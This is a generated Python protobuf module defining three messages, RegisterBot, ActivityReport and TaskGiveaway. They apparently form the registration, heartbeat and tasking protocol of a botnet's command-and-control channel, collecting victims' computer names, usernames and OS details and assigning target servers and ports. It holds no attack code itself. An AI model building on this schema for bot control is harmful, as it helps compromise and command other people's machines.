# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: test.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()




DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\ntest.proto\"\x89\x01\n\x0bRegisterBot\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x14\n\x0c\x63omputername\x18\x02 \x01(\x0c\x12\x10\n\x08username\x18\x03 \x01(\x0c\x12\x10\n\x08os_major\x18\x04 \x01(\x05\x12\x10\n\x08os_minor\x18\x05 \x01(\x05\x12\x0e\n\x06is_x64\x18\x06 \x01(\x08\x12\x11\n\tis_server\x18\x07 \x01(\x08\"\x1d\n\x0e\x41\x63tivityReport\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\":\n\x0cTaskGiveaway\x12\x0c\n\x04type\x18\x01 \x01(\x05\x12\x0e\n\x06server\x18\x02 \x01(\t\x12\x0c\n\x04port\x18\x03 \x01(\x05\x62\x06proto3')



_REGISTERBOT = DESCRIPTOR.message_types_by_name['RegisterBot']
_ACTIVITYREPORT = DESCRIPTOR.message_types_by_name['ActivityReport']
_TASKGIVEAWAY = DESCRIPTOR.message_types_by_name['TaskGiveaway']
RegisterBot = _reflection.GeneratedProtocolMessageType('RegisterBot', (_message.Message,), {
  'DESCRIPTOR' : _REGISTERBOT,
  '__module__' : 'test_pb2'
  # @@protoc_insertion_point(class_scope:RegisterBot)
  })
_sym_db.RegisterMessage(RegisterBot)

ActivityReport = _reflection.GeneratedProtocolMessageType('ActivityReport', (_message.Message,), {
  'DESCRIPTOR' : _ACTIVITYREPORT,
  '__module__' : 'test_pb2'
  # @@protoc_insertion_point(class_scope:ActivityReport)
  })
_sym_db.RegisterMessage(ActivityReport)

TaskGiveaway = _reflection.GeneratedProtocolMessageType('TaskGiveaway', (_message.Message,), {
  'DESCRIPTOR' : _TASKGIVEAWAY,
  '__module__' : 'test_pb2'
  # @@protoc_insertion_point(class_scope:TaskGiveaway)
  })
_sym_db.RegisterMessage(TaskGiveaway)

if _descriptor._USE_C_DESCRIPTORS == False:

  DESCRIPTOR._options = None
  _REGISTERBOT._serialized_start=15
  _REGISTERBOT._serialized_end=152
  _ACTIVITYREPORT._serialized_start=154
  _ACTIVITYREPORT._serialized_end=183
  _TASKGIVEAWAY._serialized_start=185
  _TASKGIVEAWAY._serialized_end=243
# @@protoc_insertion_point(module_scope)
